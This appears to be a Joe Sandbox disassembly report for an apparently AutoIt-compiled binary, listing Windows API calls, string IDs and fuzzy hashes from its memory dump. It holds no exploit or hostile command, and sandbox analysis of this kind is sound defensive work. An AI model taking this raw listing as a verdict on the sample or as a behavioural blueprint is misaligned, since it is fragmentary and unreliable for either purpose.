                                                            • GetFocus.USER32 ref: 003EC20C
                                                            • GetDlgCtrlID.USER32(00000000), ref: 003EC217
                                                            • _memset.LIBCMT ref: 003EC342
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003EC36D
                                                            • GetMenuItemCount.USER32(?), ref: 003EC38D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 003EC3A0
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003EC3D4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003EC41C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003EC454
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003EC489
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 003D738F
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003D739B
                                                            • CreateCompatibleDC.GDI32(?), ref: 003D73A7
                                                            • SelectObject.GDI32(00000000,?), ref: 003D73B4
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003D7408
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 003D7444
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003D7468
                                                            • SelectObject.GDI32(00000006,?), ref: 003D7470
                                                            • DeleteObject.GDI32(?), ref: 003D7479
                                                            • DeleteDC.GDI32(00000006), ref: 003D7480
                                                            • ReleaseDC.USER32(00000000,?), ref: 003D748B
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            APIs
                                                              • Part of subcall function 00380957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00366B0C,?,00008000), ref: 00380973
                                                              • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00366BAD
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00366CFA
                                                              • Part of subcall function 0036586D: _wcscpy.LIBCMT ref: 003658A5
                                                              • Part of subcall function 0038363D: _iswctype.LIBCMT ref: 00383645
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C2D50
                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003C2DDD
                                                            • GetMenuItemCount.USER32(00425890), ref: 003C2E66
                                                            • DeleteMenu.USER32(00425890,00000005,00000000,000000F5,?,?), ref: 003C2EF6
                                                            • DeleteMenu.USER32(00425890,00000004,00000000), ref: 003C2EFE
                                                            • DeleteMenu.USER32(00425890,00000006,00000000), ref: 003C2F06
                                                            • DeleteMenu.USER32(00425890,00000003,00000000), ref: 003C2F0E
                                                            • GetMenuItemCount.USER32(00425890), ref: 003C2F16
                                                            • SetMenuItemInfoW.USER32(00425890,00000004,00000000,00000030), ref: 003C2F4C
                                                            • GetCursorPos.USER32(?), ref: 003C2F56
                                                            • SetForegroundWindow.USER32(00000000), ref: 003C2F5F
                                                            • TrackPopupMenuEx.USER32(00425890,00000000,?,00000000,00000000,00000000), ref: 003C2F72
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003C2F7E
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 003D88D7
                                                            • CoInitialize.OLE32(00000000), ref: 003D8904
                                                            • CoUninitialize.OLE32 ref: 003D890E
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 003D8A0E
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 003D8B3B
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003F2C0C), ref: 003D8B6F
                                                            • CoGetObject.OLE32(?,00000000,003F2C0C,?), ref: 003D8B92
                                                            • SetErrorMode.KERNEL32(00000000), ref: 003D8BA5
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003D8C25
                                                            • VariantClear.OLEAUT32(?), ref: 003D8C35
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID: ,,?
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 5635db026eba6fd85b378bca01a37397cbc27834a421c97757aa682e9615fe77
                                                            • Instruction ID: 84a61d1c85112a3de9fa92fa7cfa81084289e26a077c596ab975b0898f7f391d
                                                            • Opcode Fuzzy Hash: 5635db026eba6fd85b378bca01a37397cbc27834a421c97757aa682e9615fe77
                                                            • Instruction Fuzzy Hash: BE41B03150439A8BCF1AEF10D8A2AEF3364AF11304F454565FC911B295DB789DAACBA0
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0039E2A0,00000010,?,Bad directive syntax error,003EF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003BF7C2
                                                            • LoadStringW.USER32(00000000,?,0039E2A0,00000010), ref: 003BF7C9
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • _wprintf.LIBCMT ref: 003BF7FC
                                                            • __swprintf.LIBCMT ref: 003BF81E
                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003BF88D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 1506413516-4153970271
                                                            • Opcode ID: 7b6ada2ce4853b7387d1ec0b6cb46fef6f70de5f2a68a5cac7e0759be7a21dcd
                                                            • Instruction ID: bc008beeb485bf39a46aa74906f94a25dd616f096297ed4a6b57c3531926154e
                                                            • Opcode Fuzzy Hash: 7b6ada2ce4853b7387d1ec0b6cb46fef6f70de5f2a68a5cac7e0759be7a21dcd
                                                            • Instruction Fuzzy Hash: B6213C3290021EEFCF13AF90CC4AEEE7779BF18304F04486AF5156A1A2EA719658DB51
                                                            APIs
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                              • Part of subcall function 00367924: _memmove.LIBCMT ref: 003679AD
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003C5330
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003C5346
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003C5357
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003C5369
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003C537A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            • Opcode ID: 5c965bb7f71f457169cbf1d251d3f40f89602751e635fc96a3572c32502edf73
                                                            • Instruction ID: e45ef0be6072be581803c245f6ae6a1f44f8efa3fd3e087cfd17244bdc49f000
                                                            • Opcode Fuzzy Hash: 5c965bb7f71f457169cbf1d251d3f40f89602751e635fc96a3572c32502edf73
                                                            • Instruction Fuzzy Hash: 29118231A5016979D721B661CC4AFFF7BBCEBD5B84F50042EB411E60D5DEA01D84CAA4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            • Opcode ID: 75256ab9a94fa4a630cf69300847b85903c16b5ccb4c1e4a1167468aa836a35a
                                                            • Instruction ID: 20edce0676322692a08db4af5df5a25c749d8c4fa272f21b0a8a73dbc74a8a7d
                                                            • Opcode Fuzzy Hash: 75256ab9a94fa4a630cf69300847b85903c16b5ccb4c1e4a1167468aa836a35a
                                                            • Instruction Fuzzy Hash: 8011D531900214AFCB27BB309C86FDA77BCEB01711F0502BAF855DA091EFB59E858750
                                                            APIs
                                                            • timeGetTime.WINMM ref: 003C4F7A
                                                              • Part of subcall function 0038049F: timeGetTime.WINMM(?,7707B400,00370E7B), ref: 003804A3
                                                            • Sleep.KERNEL32(0000000A), ref: 003C4FA6
                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 003C4FCA
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003C4FEC
                                                            • SetActiveWindow.USER32 ref: 003C500B
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003C5019
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 003C5038
                                                            • Sleep.KERNEL32(000000FA), ref: 003C5043
                                                            • IsWindow.USER32 ref: 003C504F
                                                            • EndDialog.USER32(00000000), ref: 003C5060
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            • Opcode ID: b3df05cc126145e132f874779a8ed5799d08a00a75e5059587117f619a1ea79f
                                                            • Instruction ID: c483e73b72d4bac21d754b2f7802e5e924b264e983573ee246d47fe59309a152
                                                            • Opcode Fuzzy Hash: b3df05cc126145e132f874779a8ed5799d08a00a75e5059587117f619a1ea79f
                                                            • Instruction Fuzzy Hash: 20215470204644BFE7325B20ECC8F263A6DEB55749F46113CF501CA1E1CAB19E919B66
                                                            APIs
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • CoInitialize.OLE32(00000000), ref: 003CD5EA
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003CD67D
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 003CD691
                                                            • CoCreateInstance.OLE32(003F2D7C,00000000,00000001,00418C1C,?), ref: 003CD6DD
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003CD74C
                                                            • CoTaskMemFree.OLE32(?,?), ref: 003CD7A4
                                                            • _memset.LIBCMT ref: 003CD7E1
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 003CD81D
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003CD840
                                                            • CoTaskMemFree.OLE32(00000000), ref: 003CD847
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003CD87E
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 003CD880
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            • Opcode ID: c44344c696fad9fcfd13e6e5905415754b16d1773de63896879881b8967201db
                                                            • Instruction ID: e7c9af46e04fd33ff54d975446f107e2be1e60160744028c00d8ef4b072e064d
                                                            • Opcode Fuzzy Hash: c44344c696fad9fcfd13e6e5905415754b16d1773de63896879881b8967201db
                                                            • Instruction Fuzzy Hash: 33B1F975A00109AFDB15DFA4C885EAEBBB9FF48304F1485A9F909EB261DB30ED45CB50
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 003BC283
                                                            • GetWindowRect.USER32(00000000,?), ref: 003BC295
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003BC2F3
                                                            • GetDlgItem.USER32(?,00000002), ref: 003BC2FE
                                                            • GetWindowRect.USER32(00000000,?), ref: 003BC310
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003BC364
                                                            • GetDlgItem.USER32(?,000003E9), ref: 003BC372
                                                            • GetWindowRect.USER32(00000000,?), ref: 003BC383
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003BC3C6
                                                            • GetDlgItem.USER32(?,000003EA), ref: 003BC3D4
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003BC3F1
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 003BC3FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: 5bc63f73efca4f3e5d63334ab7ff9499d4651afc3b222d9bc9b679d2c14af982
                                                            • Instruction ID: 0cc4d3675484d8d0307853c010ad93c73823edccd7a8f888986324696ef948bd
                                                            • Opcode Fuzzy Hash: 5bc63f73efca4f3e5d63334ab7ff9499d4651afc3b222d9bc9b679d2c14af982
                                                            • Instruction Fuzzy Hash: 47514571B10205AFDF19CFA9DD95AAEBBBAEB88710F14852DF619D72D0D7B09D008B10
                                                            APIs
                                                              • Part of subcall function 00361B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00362036,?,00000000,?,?,?,?,003616CB,00000000,?), ref: 00361B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003620D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0036216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0039BCA6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BCD7
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BCEE
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BD0A
                                                            • DeleteObject.GDI32(00000000), ref: 0039BD1C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: 978596c4a0a4317b8916a04c6c44012a6e8cdd63344d66a6efb6e790501c57a7
                                                            • Instruction ID: bb28aab3e1e019db7ebe4f3dec72326c906aee24782f1994472ea162c4f511d2
                                                            • Opcode Fuzzy Hash: 978596c4a0a4317b8916a04c6c44012a6e8cdd63344d66a6efb6e790501c57a7
                                                            • Instruction Fuzzy Hash: 88618C30201A50DFCB37AF14D988B2AB7F5FB40312F52C529E5429B9B8C7B4A891DF54
                                                            APIs
                                                              • Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC
                                                            • GetSysColor.USER32(0000000F), ref: 003621D3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: ce9ae9ed0905cb4b71766bf660905bbeb69d4b1df5f9c67c68e321c990354f46
                                                            • Instruction ID: 357a0d9da4ea80a5aa9f6c74d67a81a56fb5f13e11353e677db2405f4f8a1b47
                                                            • Opcode Fuzzy Hash: ce9ae9ed0905cb4b71766bf660905bbeb69d4b1df5f9c67c68e321c990354f46
                                                            • Instruction Fuzzy Hash: F5419F311009449FDB235F28EC98BBA3B69EB06321F168765FE658E1E9C7718D42DB21
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,003EF910), ref: 003CA90B
                                                            • GetDriveTypeW.KERNEL32(00000061,004189A0,00000061), ref: 003CA9D5
                                                            • _wcscpy.LIBCMT ref: 003CA9FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: e98d87326a9310e07bc2da509a46801002bcd0a56805874843dbe9de2e25e5e3
                                                            • Instruction ID: 53ad8a402c02e5fb258b5fe595a38965cd56abc9d80557abdd29fe9a25e93d35
                                                            • Opcode Fuzzy Hash: e98d87326a9310e07bc2da509a46801002bcd0a56805874843dbe9de2e25e5e3
                                                            • Instruction Fuzzy Hash: 8751A0355183049BC706EF14C892FAFB7A9EF84308F15882DF4959B2A2DB319D09CB53
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: __i64tow__itow__swprintf
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 421087845-2263619337
                                                            • Opcode ID: 8a9da28bbaae634f5db8d5e3e847c622e5e0b8c72e0269a33457f9b8e4722c12
                                                            • Instruction ID: cc2fa0a2fb218c562da61c9b174cae607d5a8a5fd2511ac1a725399ea1effda5
                                                            • Opcode Fuzzy Hash: 8a9da28bbaae634f5db8d5e3e847c622e5e0b8c72e0269a33457f9b8e4722c12
                                                            • Instruction Fuzzy Hash: 0C41C571504309AFDB26EF34D842B7A73ECEF06310F2184AEE549DB295EA3199458B10
                                                            APIs
                                                            • _memset.LIBCMT ref: 003E716A
                                                            • CreateMenu.USER32 ref: 003E7185
                                                            • SetMenu.USER32(?,00000000), ref: 003E7194
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E7221
                                                            • IsMenu.USER32(?), ref: 003E7237
                                                            • CreatePopupMenu.USER32 ref: 003E7241
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003E726E
                                                            • DrawMenuBar.USER32 ref: 003E7276
                                                            Strings
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                            • String ID: 0$F
                                                            • API String ID: 176399719-3044882817
                                                            • Opcode ID: 90b945406cc4f1e3dfd43082aba7d58a063386b4f52434290e4ba924abf718b6
                                                            • Instruction ID: f9a96d6a6b848b31b394177bb134a5ab5474654dced76d3a0a81df6f0fe26a6f
                                                            • Opcode Fuzzy Hash: 90b945406cc4f1e3dfd43082aba7d58a063386b4f52434290e4ba924abf718b6
                                                            • Instruction Fuzzy Hash: AA418B74A01255EFDB21DF65E884EDA7BB9FF49300F154628FA059B390D771A910CF90
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003E755E
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 003E7565
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003E7578
                                                            • SelectObject.GDI32(00000000,00000000), ref: 003E7580
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 003E758B
                                                            • DeleteDC.GDI32(00000000), ref: 003E7594
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 003E759E
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003E75B2
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003E75BE
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: 470a0b326435326e02718638c1a49f887262f29165e6d055e2973b1a040eacef
                                                            • Instruction ID: dd9727c1ef3430c14b29751d8e86866885766670b765f714f5599b5130b845f3
                                                            • Opcode Fuzzy Hash: 470a0b326435326e02718638c1a49f887262f29165e6d055e2973b1a040eacef
                                                            • Instruction Fuzzy Hash: D2314B311041A4AFDF229F65DC48FEA3B69EF0A360F114325FA159A0E0C771D811DB64
                                                            APIs
                                                            • _memset.LIBCMT ref: 00386E3E
                                                              • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                            • __gmtime64_s.LIBCMT ref: 00386ED7
                                                            • __gmtime64_s.LIBCMT ref: 00386F0D
                                                            • __gmtime64_s.LIBCMT ref: 00386F2A
                                                            • __allrem.LIBCMT ref: 00386F80
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00386F9C
                                                            • __allrem.LIBCMT ref: 00386FB3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00386FD1
                                                            • __allrem.LIBCMT ref: 00386FE8
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00387006
                                                            • __invoke_watson.LIBCMT ref: 00387077
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction ID: 0e2aa96672b93929e9d3ad3ad2af52e460d1ddd8028a3ae429bc9c0867a51d97
                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
